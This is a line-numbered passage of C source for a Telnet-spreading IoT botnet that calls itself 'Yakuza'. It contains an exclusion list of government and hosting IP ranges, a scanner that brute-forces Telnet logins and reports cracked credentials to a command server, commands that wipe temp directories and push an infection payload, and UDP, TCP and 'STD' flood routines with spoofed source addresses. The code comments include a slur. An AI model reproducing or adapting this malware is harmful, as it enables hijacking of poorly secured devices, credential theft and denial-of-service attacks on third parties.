709. (ipState[0] == 134 && ipState[1] >= 5 && ipState[1] < 235) || //Some more
710. (ipState[0] == 136 && ipState[1] >= 177 && ipState[1] < 223) || //Some more
711. (ipState[0] == 138 && ipState[1] >= 13 && ipState[1] < 194) || //Some more
712. (ipState[0] == 139 && ipState[1] >= 31 && ipState[1] < 143) || //Some more
713. (ipState[0] == 140 && ipState[1] >= 1 && ipState[1] < 203) || //Some more
714. (ipState[0] == 143 && ipState[1] >= 45 && ipState[1] < 233) || //Some more
715. (ipState[0] == 144 && ipState[1] >= 99 && ipState[1] < 253) || //Some more
716. (ipState[0] == 146 && ipState[1] >= 165 && ipState[1] < 166) || //Some more
717. (ipState[0] == 147 && ipState[1] >= 35 && ipState[1] < 43) || //Some more
718. (ipState[0] == 147 && ipState[1] >= 103 && ipState[1] < 105) || //Some more
719. (ipState[0] == 147 && ipState[1] >= 168 && ipState[1] < 170) || //Some more
720. (ipState[0] == 147 && ipState[1] >= 198 && ipState[1] < 200) || //Some more
721. (ipState[0] == 147 && ipState[1] >= 238 && ipState[1] < 255) || //Some more
722. (ipState[0] == 150 && ipState[1] >= 113 && ipState[1] < 115) || //Some more
723. (ipState[0] == 152 && ipState[1] >= 151 && ipState[1] < 155) || //Some more
724. (ipState[0] == 153 && ipState[1] >= 21 && ipState[1] < 32) || //Some more
725. (ipState[0] == 155 && ipState[1] >= 5 && ipState[1] < 10) || //Some more
726. (ipState[0] == 155 && ipState[1] >= 74 && ipState[1] < 89) || //Some more
727. (ipState[0] == 155 && ipState[1] >= 213 && ipState[1] < 222) || //Some more
728. (ipState[0] == 157 && ipState[1] >= 150 && ipState[1] < 154) || //Some more
729. (ipState[0] == 158 && ipState[1] >= 1 && ipState[1] < 21) || //Some more
730. (ipState[0] == 158 && ipState[1] >= 235 && ipState[1] < 247) || //Some more
731. (ipState[0] == 159 && ipState[1] >= 120 && ipState[1] < 121) || //Some more
732. (ipState[0] == 160 && ipState[1] >= 132 && ipState[1] < 151) || //Some more
733. (ipState[0] == 64 && ipState[1] >= 224 && ipState[1] < 227) || //Some more
734. (ipState[0] == 162 && ipState[1] >= 45 && ipState[1] < 47) || //CIA
735. (ipState[0] == 163 && ipState[1] >= 205 && ipState[1] < 207) || //NASA Kennedy Space Center
736. (ipState[0] == 164 && ipState[1] >= 45 && ipState[1] < 50) || //NASA Kennedy Space Center
737. (ipState[0] == 164 && ipState[1] >= 217 && ipState[1] < 233) || //NASA Kennedy Space Center
738. (ipState[0] == 169 && ipState[1] >= 252 && ipState[1] < 254) || //U.S. Department of State
739. (ipState[0] == 199 && ipState[1] >= 121 && ipState[1] < 254) || //Naval Air Systems Command, VA
740. (ipState[0] == 205 && ipState[1] >= 1 && ipState[1] < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
741. (ipState[0] == 207 && ipState[1] >= 60 && ipState[1] < 62) || //FBI controlled Linux servers & IPs/IP-Ranges
742. (ipState[0] == 104 && ipState[1] >= 16 && ipState[1] < 31) || //Cloudflare
743. (ipState[0] == 188 && ipState[1] == 166) || //Digital Ocean
744. (ipState[0] == 188 && ipState[1] == 226) || //Digital Ocean
745. (ipState[0] == 159 && ipState[1] == 203) || //Digital Ocean
746. (ipState[0] == 162 && ipState[1] == 243) || //Digital Ocean
747. (ipState[0] == 45 && ipState[1] == 55) || //Digital Ocean
748. (ipState[0] == 178 && ipState[1] == 62) || //Digital Ocean
749. (ipState[0] == 104 && ipState[1] == 131) || //Digital Ocean
750. (ipState[0] == 104 && ipState[1] == 236) || //Digital Ocean
751. (ipState[0] == 107 && ipState[1] == 170) || //Digital Ocean
752. (ipState[0] == 138 && ipState[1] == 197) || //Digital Ocean
753. (ipState[0] == 138 && ipState[1] == 68) || //Digital Ocean
754. (ipState[0] == 139 && ipState[1] == 59) || //Digital Ocean
755. (ipState[0] == 146 && ipState[1] == 185 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
756. (ipState[0] == 163 && ipState[1] == 47 && ipState[2] >= 10 && ipState[2] < 11) || //Digital Ocean
757. (ipState[0] == 174 && ipState[1] == 138 && ipState[2] >= 1 && ipState[2] < 127) || //Digital Ocean
758. (ipState[0] == 192 && ipState[1] == 241 && ipState[2] >= 128 && ipState[2] < 255) || //Digital Ocean
759. (ipState[0] == 198 && ipState[1] == 199 && ipState[2] >= 64 && ipState[2] < 127) || //Digital Ocean
760. (ipState[0] == 198 && ipState[1] == 211 && ipState[2] >= 96 && ipState[2] < 127) || //Digital Ocean
761. (ipState[0] == 207 && ipState[1] == 154 && ipState[2] >= 192 && ipState[2] < 255) || //Digital Ocean
762. (ipState[0] == 37 && ipState[1] == 139 && ipState[2] >= 1 && ipState[2] < 31) || //Digital Ocean
763. (ipState[0] == 67 && ipState[1] == 207 && ipState[2] >= 64 && ipState[2] < 95) || //Digital Ocean
764. (ipState[0] == 67 && ipState[1] == 205 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
765. (ipState[0] == 80 && ipState[1] == 240 && ipState[2] >= 128 && ipState[2] < 143) || //Digital Ocean
766. (ipState[0] == 82 && ipState[1] == 196 && ipState[2] >= 1 && ipState[2] < 15) || //Digital Ocean
767. (ipState[0] == 95 && ipState[1] == 85 && ipState[2] >= 8 && ipState[2] < 63) || //Digital Ocean
768. (ipState[0] == 64 && ipState[1] == 237 && ipState[2] >= 32 && ipState[2] < 43) || //Choopa & Vultr
769. (ipState[0] == 185 && ipState[1] == 92 && ipState[2] >= 220 && ipState[2] < 223) || //Choopa & Vultr
770. (ipState[0] == 104 && ipState[1] == 238 && ipState[2] >= 128 && ipState[2] < 191) || //Choopa & Vultr
771. (ipState[0] == 209 && ipState[1] == 222 && ipState[2] >= 1 && ipState[2] < 31) || //Choopa & Vultr
772. (ipState[0] == 208 && ipState[1] == 167 && ipState[2] >= 232 && ipState[2] < 252) || //Choopa & Vultr
773. (ipState[0] == 66 && ipState[1] == 55 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
774. (ipState[0] == 45 && ipState[1] == 63 && ipState[2] >= 1 && ipState[2] < 127) || //Choopa & Vultr
775. (ipState[0] == 216 && ipState[1] == 237 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
776. (ipState[0] == 108 && ipState[1] == 61) || //Choopa & Vultr
777. (ipState[0] == 45 && ipState[1] == 76) || //Choopa & Vultr
778. (ipState[0] == 185 && ipState[1] == 11 && ipState[2] >= 144 && ipState[2] < 148) || //Blazingfast & Nforce
779. (ipState[0] == 185 && ipState[1] == 56 && ipState[2] >= 21 && ipState[2] < 23) || //Blazingfast & Nforce
780. (ipState[0] == 185 && ipState[1] == 61 && ipState[2] >= 136 && ipState[2] < 139) || //Blazingfast & Nforce
781. (ipState[0] == 185 && ipState[1] == 62 && ipState[2] >= 187 && ipState[2] < 191) || //Blazingfast & Nforce
782. (ipState[0] == 66 && ipState[1] == 150 && ipState[2] >= 120 && ipState[2] < 215) || //Blazingfast & Nforce
783. (ipState[0] == 66 && ipState[1] == 151 && ipState[2] >= 137 && ipState[2] < 139) || //Blazingfast & Nforce
784. (ipState[0] == 64 && ipState[1] == 94 && ipState[2] >= 237 && ipState[2] < 255) || //Blazingfast & Nforce
785. (ipState[0] == 63 && ipState[1] == 251 && ipState[2] >= 19 && ipState[2] < 21) || //Blazingfast & Nforce
786. (ipState[0] == 70 && ipState[1] == 42 && ipState[2] >= 73 && ipState[2] < 75) || //Blazingfast & Nforce
787. (ipState[0] == 74 && ipState[1] == 91 && ipState[2] >= 113 && ipState[2] < 115) || //Blazingfast & Nforce
788. (ipState[0] == 74 && ipState[1] == 201 && ipState[2] >= 56 && ipState[2] < 58) || //Blazingfast & Nforce
789. (ipState[0] == 188 && ipState[1] == 209 && ipState[2] >= 48 && ipState[2] < 53) || //Blazingfast & Nforce
790. (ipState[0] == 188 && ipState[1] == 165) || //OVH
791. (ipState[0] == 149 && ipState[1] == 202) || //OVH
792. (ipState[0] == 151 && ipState[1] == 80) || //OVH
793. (ipState[0] == 164 && ipState[1] == 132) || //OVH
794. (ipState[0] == 176 && ipState[1] == 31) || //OVH
795. (ipState[0] == 167 && ipState[1] == 114) || //OVH
796. (ipState[0] == 178 && ipState[1] == 32) || //OVH
797. (ipState[0] == 178 && ipState[1] == 33) || //OVH
798. (ipState[0] == 37 && ipState[1] == 59) || //OVH
799. (ipState[0] == 37 && ipState[1] == 187) || //OVH
800. (ipState[0] == 46 && ipState[1] == 105) || //OVH
801. (ipState[0] == 51 && ipState[1] == 254) || //OVH
802. (ipState[0] == 51 && ipState[1] == 255) || //OVH
803. (ipState[0] == 5 && ipState[1] == 135) || //OVH
804. (ipState[0] == 5 && ipState[1] == 196) || //OVH
805. (ipState[0] == 5 && ipState[1] == 39) || //OVH
806. (ipState[0] == 91 && ipState[1] == 134) || //OVH
807. (ipState[0] == 104 && ipState[1] == 200 && ipState[2] >= 128 && ipState[2] < 159) || //Total Server Solutions
808. (ipState[0] == 107 && ipState[1] == 152 && ipState[2] >= 96 && ipState[2] < 111) || //Total Server Solutions
809. (ipState[0] == 107 && ipState[1] == 181 && ipState[2] >= 160 && ipState[2] < 189) || //Total Server Solutions
810. (ipState[0] == 172 && ipState[1] == 98 && ipState[2] >= 64 && ipState[2] < 95) || //Total Server Solutions
811. (ipState[0] == 184 && ipState[1] == 170 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
812. (ipState[0] == 192 && ipState[1] == 111 && ipState[2] >= 128 && ipState[2] < 143) || //Total Server Solutions
813. (ipState[0] == 192 && ipState[1] == 252 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
814. (ipState[0] == 192 && ipState[1] == 40 && ipState[2] >= 56 && ipState[2] < 59) || //Total Server Solutions
815. (ipState[0] == 198 && ipState[1] == 8 && ipState[2] >= 81 && ipState[2] < 95) || //Total Server Solutions
816. (ipState[0] == 199 && ipState[1] == 116 && ipState[2] >= 112 && ipState[2] < 119) || //Total Server Solutions
817. (ipState[0] == 199 && ipState[1] == 229 && ipState[2] >= 248 && ipState[2] < 255) || //Total Server Solutions
818. (ipState[0] == 199 && ipState[1] == 36 && ipState[2] >= 220 && ipState[2] < 223) || //Total Server Solutions
819. (ipState[0] == 199 && ipState[1] == 58 && ipState[2] >= 184 && ipState[2] < 187) || //Total Server Solutions
820. (ipState[0] == 206 && ipState[1] == 220 && ipState[2] >= 172 && ipState[2] < 175) || //Total Server Solutions
821. (ipState[0] == 208 && ipState[1] == 78 && ipState[2] >= 40 && ipState[2] < 43) || //Total Server Solutions
822. (ipState[0] == 208 && ipState[1] == 93 && ipState[2] >= 192 && ipState[2] < 193) || //Total Server Solutions
823. (ipState[0] == 66 && ipState[1] == 71 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
824. (ipState[0] == 98 && ipState[1] == 142 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
825. (ipState[0] == 107 && ipState[1] >= 20 && ipState[1] < 24) || //Amazon
826. (ipState[0] == 35 && ipState[1] >= 159 && ipState[1] < 183) || //Amazon
827. (ipState[0] == 52 && ipState[1] >= 1 && ipState[1] < 95) || //Amazon
828. (ipState[0] == 52 && ipState[1] >= 95 && ipState[1] < 255) || //Amazon + Microsoft
829. (ipState[0] == 54 && ipState[1] >= 64 && ipState[1] < 95) || //Amazon + Microsoft
830. (ipState[0] == 54 && ipState[1] >= 144 && ipState[1] < 255) || //Amazon + Microsoft
831. (ipState[0] == 13 && ipState[1] >= 52 && ipState[1] < 60) || //Amazon + Microsoft
832. (ipState[0] == 13 && ipState[1] >= 112 && ipState[1] < 115) || //Amazon + Microsoft
833. (ipState[0] == 163 && ipState[1] == 172) || //ONLINE SAS
834. (ipState[0] == 51 && ipState[1] >= 15 && ipState[1] < 255) || //ONLINE SAS
835. (ipState[0] == 79 && ipState[1] == 121 && ipState[2] >= 128 && ipState[2] < 255) || //Some more
836. (ipState[0] == 212 && ipState[1] == 47 && ipState[2] >= 224 && ipState[2] < 255) || //Some more
837. (ipState[0] == 89 && ipState[1] == 34 && ipState[2] >= 96 && ipState[2] < 97) || //Some more
838. (ipState[0] == 219 && ipState[1] >= 216 && ipState[1] < 231) || //Some more
839. (ipState[0] == 23 && ipState[1] >= 94 && ipState[1] < 109) || //Some more
840. (ipState[0] == 178 && ipState[1] >= 62 && ipState[1] < 63) || //Some more
841. (ipState[0] == 106 && ipState[1] >= 182 && ipState[1] < 189) || //Some more
842. (ipState[0] == 106 && ipState[1] >= 184) || //Some more
843. (ipState[0] == 106 && ipState[1] == 105) || //Honeypot
844. (ipState[0] == 34 && ipState[1] >= 245 && ipState[1] < 255) || //Some more
845. (ipState[0] == 87 && ipState[1] >= 97 && ipState[1] < 99) || //Some more
846. (ipState[0] == 86 && ipState[1] == 208) || //Some more
847. (ipState[0] == 86 && ipState[1] == 209) || //Some more
848. (ipState[0] == 193 && ipState[1] == 164) || //Some more
849. (ipState[0] == 120 && ipState[1] >= 103 && ipState[1] < 108) || //Ministry of Education Computer Science
850. (ipState[0] == 188 && ipState[1] == 68) || //Ministry of Education Computer Science
851. (ipState[0] == 78 && ipState[1] == 46) || //Ministry of Education Computer Science
852. (ipState[0] == 224)) { //Multicast
853. (ipState[0] == 6 || ipState[0] == 7 || ipState[0] == 11 || ipState[0] == 21 || ipState[0] == 22 || ipState[0] == 26 || ipState[0] == 28 || ipState[0] == 29 || ipState[0] == 30 || ipState[0] == 33 || ipState[0] == 55 || ipState[0] == 214 || ipState[0] == 215)
854. )
855. {
856. ipState[0] = rand() % 223;
857. ipState[1] = rand() % 255;
858. ipState[2] = rand() % 255;
859. ipState[3] = rand() % 255;
860. }
861. char ip[16] = {0};
862. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
863. return inet_addr(ip);
864. }
865.  
866. in_addr_t getRandomIP(in_addr_t netmask) {
867. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
868. return tmp ^ ( rand_cmwc() & ~netmask);
869. }
870. unsigned short csum (unsigned short *buf, int count) {
871. register uint64_t sum = 0;
872. while( count > 1 ) { sum += *buf++; count -= 2; }
873. if(count > 0) { sum += *(unsigned char *)buf; }
874. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
875. return (uint16_t)(~sum);
876. }
877. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
878. struct tcp_pseudo {
879. unsigned long src_addr;
880. unsigned long dst_addr;
881. unsigned char zero;
882. unsigned char proto;
883. unsigned short length;
884. } pseudohead;
885. unsigned short total_len = iph->tot_len;
886. pseudohead.src_addr=iph->saddr;
887. pseudohead.dst_addr=iph->daddr;
888. pseudohead.zero=0;
889. pseudohead.proto=IPPROTO_TCP;
890. pseudohead.length=htons(sizeof(struct tcphdr));
891. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
892. unsigned short *tcp = malloc(totaltcp_len);
893. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
894. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
895. unsigned short output = csum(tcp,totaltcp_len);
896. free(tcp);
897. return output;
898. }
899. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
900. iph->ihl = 5;
901. iph->version = 4;
902. iph->tos = 0;
903. iph->tot_len = sizeof(struct iphdr) + packetSize;
904. iph->id = rand_cmwc();
905. iph->frag_off = 0;
906. iph->ttl = MAXTTL;
907. iph->protocol = protocol;
908. iph->check = 0;
909. iph->saddr = source;
910. iph->daddr = dest;
911. }
912. int sclose(int fd) {
913. if(3 > fd) return 1;
914. close(fd);
915. return 0;
916. }
917.  
918. void TelnetScanner(int wait_usec, int maxfds)
919. {
920. int max = getdtablesize() - 100, i, res, num_tmps, j;
921. char buf[128], cur_dir;
922. if (max > maxfds)
923. max = maxfds;
924. fd_set fdset;
925. struct timeval tv;
926. socklen_t lon;
927. int valopt;
928. char line[256];
929. char* buffer;
930. struct sockaddr_in dest_addr;
931. dest_addr.sin_family = AF_INET;
932. dest_addr.sin_port = htons(23);
933. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
934. buffer = malloc(SOCKBUF_SIZE + 1);
935. memset(buffer, 0, SOCKBUF_SIZE + 1);
936. struct telstate_t fds[max];
937. memset(fds, 0, max * (sizeof(int) + 1));
938. for(i = 0; i < max; i++) {
939. memset(&(fds[i]), 0, sizeof(struct telstate_t));
940. fds[i].complete = 1;
941. fds[i].sockbuf = buffer;
942. }
943. while(1) {
944. for(i = 0; i < max; i++) {
945. if(fds[i].tTimeout == 0) {
946. fds[i].tTimeout = time(NULL);
947. }
948. switch(fds[i].state) {
949. case 0:
950. {
951. if(fds[i].complete == 1)
952. {
953.  
954. char *tmp = fds[i].sockbuf;
955. memset(&(fds[i]), 0, sizeof(struct telstate_t));
956. fds[i].sockbuf = tmp;
957.  
958.  
959. fds[i].ip = TelnetIPRanges();
960. }
961. else if(fds[i].complete == 0)
962. {
963. fds[i].usernameInd++;
964. fds[i].passwordInd++;
965.  
966. if(fds[i].passwordInd == sizeof(tel_passwords) / sizeof(char *))
967. {
968. fds[i].complete = 1;
969. }
970. if(fds[i].usernameInd == sizeof(tel_usernames) / sizeof(char *))
971. {
972. fds[i].complete = 1;
973. continue;
974. }
975. }
976. dest_addr.sin_family = AF_INET;
977. dest_addr.sin_port = htons(23);
978. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
979.  
980. dest_addr.sin_addr.s_addr = fds[i].ip;
981. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
982. if(fds[i].fd == -1) continue;
983. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
984.  
985. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
986. {
987. reset_telstate(&fds[i]);
988. }
989. else
990. {
991. advance_telstate(&fds[i], 1);
992. }
993. }
994. break;
995. case 1:
996. {
997. FD_ZERO(&fdset);
998. FD_SET(fds[i].fd, &fdset);
999. tv.tv_sec = 0;
1000. tv.tv_usec = wait_usec;
1001. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1002. if(res == 1)
1003. {
1004. fds[i].tTimeout = time(NULL);
1005. lon = sizeof(int);
1006. valopt = 0;
1007. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1008. if(valopt)
1009. {
1010. reset_telstate(&fds[i]);
1011. }
1012. else
1013. {
1014. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1015. advance_telstate(&fds[i], 2);
1016. }
1017. continue;
1018. }
1019. else if(res == -1)
1020. {
1021. reset_telstate(&fds[i]);
1022. continue;
1023. }
1024. if(fds[i].tTimeout + 7 < time(NULL))
1025. {
1026. reset_telstate(&fds[i]);
1027. }
1028. }
1029. break;
1030. case 2:
1031. {
1032. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1033. {
1034. fds[i].tTimeout = time(NULL);
1035. if(contains_fail(fds[i].sockbuf))
1036. {
1037. advance_telstate(&fds[i], 0);
1038. }
1039. else
1040. {
1041. advance_telstate(&fds[i], 3);
1042. }
1043. continue;
1044. }
1045. if(fds[i].tTimeout + 7 < time(NULL))
1046. {
1047. reset_telstate(&fds[i]);
1048. }
1049. }
1050. break;
1051. case 3:
1052. {
1053. if(send(fds[i].fd, tel_usernames[fds[i].usernameInd], strlen(tel_usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1054. {
1055. reset_telstate(&fds[i]);
1056. continue;
1057. }
1058. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1059. {
1060. reset_telstate(&fds[i]);
1061. continue;
1062. }
1063. advance_telstate(&fds[i], 4);
1064. }
1065. break;
1066. case 4:
1067. {
1068. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1069. {
1070. fds[i].tTimeout = time(NULL);
1071. if(contains_fail(fds[i].sockbuf))
1072. {
1073. advance_telstate(&fds[i], 0);
1074. }
1075. else
1076. {
1077. advance_telstate(&fds[i], 5);
1078. }
1079. continue;
1080. }
1081. if(fds[i].tTimeout + 7 < time(NULL))
1082. {
1083. reset_telstate(&fds[i]);
1084. }
1085. }
1086. break;
1087. case 5:
1088. {
1089. if(send(fds[i].fd, tel_passwords[fds[i].passwordInd], strlen(tel_passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
1090. {
1091. reset_telstate(&fds[i]);
1092. continue;
1093. }
1094. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1095. {
1096. reset_telstate(&fds[i]);
1097. continue;
1098. }
1099. advance_telstate(&fds[i], 6);
1100. }
1101. break;
1102. case 6:
1103. {
1104. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2)) //waiting for response.
1105. {
1106. fds[i].tTimeout = time(NULL);
1107. if(contains_fail(fds[i].sockbuf))
1108. {
1109. advance_telstate(&fds[i], 0);
1110. }
1111. else if(contains_success(fds[i].sockbuf))
1112. {
1113. if(fds[i].complete == 2)
1114. {
1115. advance_telstate(&fds[i], 7);
1116. }
1117. else
1118. {
1119. sockprintf(mainCommSock, "[ Yakuza ] Result || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), tel_usernames[fds[i].usernameInd], tel_passwords[fds[i].passwordInd]);
1120. advance_telstate(&fds[i], 7);
1121. }
1122. }
1123. else
1124. {
1125. reset_telstate(&fds[i]);
1126. }
1127. continue;
1128. }
1129. if(fds[i].tTimeout + 7 < time(NULL))
1130. {
1131. reset_telstate(&fds[i]);
1132. }
1133. }
1134. break;
1135.  
1136. case 7:
1137. {
1138. char CleanDevice [80];
1139. sprintf(CleanDevice, "rm -rf %s;", tempdirs);
1140. if(send(fds[i].fd, CleanDevice, strlen(CleanDevice), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1141. RemoveTempDirs();
1142. sockprintf(mainCommSock, "[ Yakuza ] Cleaning Device || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), tel_usernames[fds[i].usernameInd], tel_passwords[fds[i].passwordInd]);
1143.  
1144. advance_telstate(&fds[i], 8);
1145. }
1146. break;
1147. case 8:
1148. {
1149.  
1150. fds[i].tTimeout = time(NULL);
1151.  
1152. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
1153. if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
1154.  
1155. if(send(fds[i].fd, payload, strlen(payload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1156. sockprintf(mainCommSock, "[ Yakuza ] Infecting || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), tel_usernames[fds[i].usernameInd], tel_passwords[fds[i].passwordInd]);
1157.  
1158. //int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings)
1159. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "connected"))
1160. { // if you removed my credits then fuck you. hail scarface.
1161. //char strcasestr (const char *big, const char *little)
1162. if(strcasestr(fds[i].sockbuf, "LINKED") && fds[i].complete != 3)
1163. {
1164. sockprintf(mainCommSock, "[ Yakuza ] Infection Success || IP: %s: || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), tel_usernames[fds[i].usernameInd], tel_passwords[fds[i].passwordInd]);
1165. }
1166. }
1167. if(fds[i].tTimeout + 45 < time(NULL))
1168. {
1169. if(fds[i].complete!=3)
1170. {
1171. sockprintf(mainCommSock, "[ Yakuza ] Failed || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), tel_usernames[fds[i].usernameInd], tel_passwords[fds[i].passwordInd]);
1172. }
1173. reset_telstate(&fds[i]);
1174. }
1175. break;
1176. }
1177. }
1178. }
1179. }
1180. }
1181. void SendSTD(unsigned char *ip, int port, int secs) {
1182. int iSTD_Sock;
1183. iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
1184. time_t start = time(NULL);
1185. struct sockaddr_in sin;
1186. struct hostent *hp;
1187. hp = gethostbyname(ip);
1188. bzero((char*) &sin,sizeof(sin));
1189. bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
1190. sin.sin_family = hp->h_addrtype;
1191. sin.sin_port = port;
1192. unsigned int a = 0;
1193. while(1){
1194. char *randstrings[] = {"PozHlpiND4xPDPuGE6tq","tg57YSAcuvy2hdBlEWMv","VaDp3Vu5m5bKcfCU96RX","UBWcPjIZOdZ9IAOSZAy6","JezacHw4VfzRWzsglZlF","3zOWSvAY2dn9rKZZOfkJ","oqogARpMjAvdjr9Qsrqj","yQAkUvZFjxExI3WbDp2g","35arWHE38SmV9qbaEDzZ","kKbPlhAwlxxnyfM3LaL0","a7pInUoLgx1CPFlGB5JF","yFnlmG7bqbW682p7Bzey","S1mQMZYF6uLzzkiULnGF","jKdmCH3hamvbN7ZvzkNA","bOAFqQfhvMFEf9jEZ89M","VckeqgSPaAA5jHdoFpCC","CwT01MAGqrgYRStHcV0X","72qeggInemBIQ5uJc1jQ","zwcfbtGDTDBWImROXhdn","w70uUC1UJYZoPENznHXB","EoXLAf1xXR7j4XSs0JTm","lgKjMnqBZFEvPJKpRmMj","lSvZgNzxkUyChyxw1nSr","VQz4cDTxV8RRrgn00toF","YakuzaBotnet","Scarface1337"};
1195. char *STD2_STRING = randstrings[rand() % (sizeof(randstrings) / sizeof(char *))];
1196. if (a >= 50)
1197. {
1198. send(iSTD_Sock, STD2_STRING, STD2_SIZE, 0);
1199. connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
1200. if (time(NULL) >= start + secs)
1201. {
1202. close(iSTD_Sock);
1203. _exit(0);
1204. }
1205. a = 0;
1206. }
1207. a++;
1208. }
1209. }
1210. void SendUDP(unsigned char *target, int port, int timeEnd, int packetsize, int pollinterval, int spoofit) {
1211. struct sockaddr_in dest_addr;
1212. dest_addr.sin_family = AF_INET;
1213. if(port == 0) dest_addr.sin_port = rand_cmwc();
1214. else dest_addr.sin_port = htons(port);
1215. if(getHost(target, &dest_addr.sin_addr)) return;
1216. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1217. register unsigned int pollRegister;
1218. pollRegister = pollinterval;
1219. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1220. if(!sockfd) {
1221. return;
1222. }
1223. int tmp = 1;
1224. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) {
1225. return;
1226. }
1227. int counter = 50;
1228. while(counter--) {
1229. srand(time(NULL) ^ rand_cmwc());
1230. init_rand(rand());
1231. }
1232. in_addr_t netmask;
1233. netmask = ( ~((1 << (32 - spoofit)) - 1) );
1234. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1235. struct iphdr *iph = (struct iphdr *)packet;
1236. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1237. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1238. udph->len = htons(sizeof(struct udphdr) + packetsize);
1239. udph->source = rand_cmwc();
1240. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1241. udph->check = 0;
1242. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1243. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1244. int end = time(NULL) + timeEnd;
1245. register unsigned int i = 0;
1246. while(1) {
1247. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1248. udph->source = rand_cmwc();
1249. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1250. iph->id = rand_cmwc();
1251. iph->saddr = htonl( getRandomIP(netmask) );
1252. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1253. if(i == pollRegister) {
1254. if(time(NULL) > end) break;
1255. i = 0;
1256. continue;
1257. }
1258. i++;
1259. }
1260. }
1261. void SendTCP(unsigned char *target, int port, int timeEnd, unsigned char *flags, int packetsize, int pollinterval, int spoofit) {
1262. register unsigned int pollRegister;
1263. pollRegister = pollinterval;
1264. struct sockaddr_in dest_addr;
1265. dest_addr.sin_family = AF_INET;
1266. if(port == 0) dest_addr.sin_port = rand_cmwc();
1267. else dest_addr.sin_port = htons(port);
1268. if(getHost(target, &dest_addr.sin_addr)) return;
1269. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1270. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1271. if(!sockfd) { return; }
1272. int tmp = 1;
1273. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
1274. in_addr_t netmask;
1275. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1276. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1277. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1278. struct iphdr *iph = (struct iphdr *)packet;
1279. // in case a fag removes my credits. me is scarface.
1280. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
